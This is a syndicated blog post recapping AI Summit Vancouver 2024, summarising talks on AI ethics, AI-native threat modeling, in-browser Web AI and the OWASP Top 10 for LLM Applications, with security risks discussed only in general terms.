At one point in the not-too-distant past, the most exciting technology being explored throughout the world was steam power. People found a way to use steam to power almost everything, from boats and trains to sewing machines and musical instruments. The city of Vancouver, BC, Canada, even installed the Gastown Steam Clock, finding a very practical use for steam to help people in the area. The same spirit of finding helpful uses of an emerging technology was very present in Vancouver as over 250 LLM enthusiasts gathered for AI Summit Vancouver 2024.
The beginning of November saw 50 expert speakers give 35 sessions and panel discussions across this 2-day conference. This inaugural event marked Vancouver’s entry into the world hosting AI summits, highlighting the intersection of technology, ethics, and security. The first-time organizers put on an event where the conversations and ideas flowed freely between groups of LLM enthusiasts, entrepreneurs, students, and developers working to deploy AI-enabled applications at their companies.
Here are just a few highlights from this first-of-its-kind event in Vancouver.
AI Summit Vancouver
People are ends unto themselves, not just a means
In his opening keynote, “The Deeper Ethics of AI,” Morten Rand-Hendriksen, Principal Staff Instructor at LinkedIn pragmatic futurist, opened the conversation on AI ethics by underscoring a critical perspective: “AI is political.” Inspired by historian Timothy Snyder, he asserted that “life itself is political because people are watching what you do, not just what you say,” meaning that every technological decision reflects and amplifies values, whether we acknowledge it or not.
He shared his observation that every company he talks with thinks their competitors are way ahead and just sitting on new tech they are about to release. This forces everyone to move at breakneck speed. He said he is always surprised by the amount of pushback when he shares this point with business leaders. Everyone just assumes they are the ones behind and are about to be crushed in the market, no matter what data you show them. This creates an atmosphere where everyone believes whatever they do is justified by “if we don’t do it, they will.”Morten outlined four frames to evaluate technology:
- Utility – Who benefits from the technology, and at what cost? We need to ask what the problem is and whose problem it is.
- Responsibility – There is no such thing as value-neutral tech. Developers to consciously take on responsibility for their work’s societal impact and the biases they built into their platforms.
- Values – His stance was clear: if something feels ethically wrong, it’s worth re-evaluating, as values define our goals. Treat people as ends in themselves, not merely as means.
- Capabilities – All technology helps someone do something. Morten cautioned us against an unchecked drive for “more AI everywhere.” We should focus on deploying AI intentionally rather than as an omnipresent force.
Morten’s parting advice was straightforward yet profound: “Focus on building a society that values people as ends in themselves, rather than viewing them as means to an end.”
Morten Rand-Hendriksen
Threat modeling for AI means preparing for the risks
Nicholas Muy, CISO at Scrut Automation, presented “Need for AI-native threat modeling practices for security of AI pipelines,” which served as a call to re-imagine security frameworks that can handle the unique vulnerabilities of AI. The first step to this threat modeling approach is defining the risks. Nicholas broke it down into a few basic categories: threats to LLMs, threats from applications using LLMs, and threats to overall security when integrating AI systems. He stressed the role of Data Loss Prevention (DLP) in AI, where machine learning can streamline tasks like regex-based data protection.
Nicholas emphasized a hands-on approach to securing data pipelines, identifying the need for trust validation across various points in the process. He advocated for “pipeline views,” which break down AI processes into manageable sections and help clarify where trust is assumed. In his view, effective threat modeling must incorporate cross-team collaboration, combining insights from development and security teams.
He recommended focusing on understanding which inputs can be trusted and which cannot, treating this as the foundation of all AI-native security frameworks. Nicholas concluded that effective AI threat modeling is not about creating impenetrable walls but understanding and preparing for how interconnected systems can lead to unexpected vulnerabilities.
Nicholas Muy
AI is faster, and safer, when running in the browser
In his presentation “Web AI in 2024: Superpowers for Modern Web Apps,” Jason Mayes, Web AI Lead for Developer Relations Engineering at Google, explained that for many AI applications, the absolute best place you can run them is locally, in your browser. This approach eliminates the need for cloud-based solutions and all the privacy, as well as latency concerns, server-side AI implementations bring. These benefits are very significant for industries prioritizing data sovereignty and privacy.
Client-side AI preserves user privacy, as data never leaves the local machine. This approach offers offline capabilities and allows services to only retrieve metadata or anonymized data from end users. For example, AI-powered background blurring for video calls requires rapid processing that could add latency if the image needs to be sent over the web first. By blurring locally with client-side AI, that lag is gone. The power of Web AI is already evident in Adobe’s implementation for real-time webcam segmentation, noise cancellation, and even live LLMs running within browsers.
Jason’s vision is that Web AI’s reach will grow as JavaScript-based models are created for diverse applications—from object detection to image recognition and augmented reality. He encouraged us to reimagine what we can do with the web page, highlighting the potential of technologies like VisualBlocks that empower developers with block-based AI model creation.
Jason Mayes
The potential dark side of AI and what to do about it
OWASP Core Team AI Security member and stealth startup Co-Founder Talesh Seeparsan offered a sobering reflection on AI’s potential to enable malicious activity in his talk, “This is How Your AI Is Going to Get You Into Trouble.” He introduces us to the idea of systems impact vs human impact. Systems impacts include technical glitches, bugs, and security issues caused by misconfiguration or lack of protection. Human impacts directly impact people’s lives.
For example, a systems impact event could be discovering you can remotely execute code through an application, while a human impact event could be leaking personal information that leads to blackmail. While both types of events are bad, Talesh implored us to care more about the human side of things when thinking through the likelihood of attacks and what preventative measures we should take.
Fortunately, he and the OWASP team are about to release the new Top 10 for LLM Applications. This latest OWASP guidance on securing AI systems includes prompt injection, model theft, insecure output handling, and failure to protect against disclosure of sensitive information. Talesh underscored the critical need for caution when adopting these new tools, especially in unregulated spaces.
Talesh Seeparsan
A community discussing AI’s promise and pitfalls
There were a lot of discussions throughout the event about the safety of using AI, especially at scale. Your author was able to give a talk about the hidden dangers of AI. I engaged with multiple developers who are being asked to use AI to speed up their output but are not being trained on it or have not been given security awareness training in most cases. While the allure of rapid AI advancements is undeniable, the summit underscored the importance of putting ethical and security considerations at the forefront of development.
Another aspect at the center of the panels and discussions was funding AI-driven businesses. Many attendees were entrepreneurs who were there to find ways to fund their AI-powered startup, which regional agencies and investors are keen to do, as long as the underlying products help solve real problems. Vancouver’s first summit set a thoughtful tone for future AI discussions. The power of AI lies not just in its algorithms but in the values and structures we embed within it.
*** This is a Security Bloggers Network syndicated blog from GitGuardian Blog – Take Control of Your Secrets Security authored by Dwayne McDaniel. Read the original post at: https://blog.gitguardian.com/ai-summit-vancouver-2024/